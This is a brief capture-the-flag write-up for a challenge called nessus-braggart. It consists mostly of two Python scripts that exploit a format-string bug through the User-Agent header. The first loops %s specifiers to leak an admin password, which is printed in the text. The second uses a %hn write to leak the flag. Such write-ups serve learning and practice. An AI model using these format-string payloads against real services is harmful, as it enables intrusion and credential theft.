Rating:
First use printf to leak the adminpass, then use a printf %hn to overwrite "br" into a "fl" to leak the flag.
Leak AdminPass:
```
import pwn
import time
import warnings
import requests
for i in range(320, 5000):
try:
r = requests.post("https://nessus-braggart.chals.io/sec.cgi", headers={"X-DEBUG": "1", "User-Agent": "A"*1008 + f"%{i}$s"}, timeout=5)
d = r.text.split("User Agent : </h3>")[1].split("")[0]
# d = bytes.fromhex(d[2:])[::-1]
print(i, d)
except:
pass
# AdminPass=xbYP3h7Ua94c
```
Leak Flag:
```
import pwn
import time
import warnings
import requests
r = requests.post("https://nessus-braggart.chals.io/sec.cgi", headers={"X-DEBUG": "1","X-PASSWORD":"xbYP3h7Ua94c" , "User-Agent": "A"*1008 + '%27750x' + "%267$hn" + "%267$s"}, timeout=5)
# print(r.text
d = r.text.split("User Agent : </h3>")[1].split("")[0]
print(d)
print(r.text)
```
Full walkthrough can be found in video.
https://youtu.be/g0mVAbZUXqM?t=1139
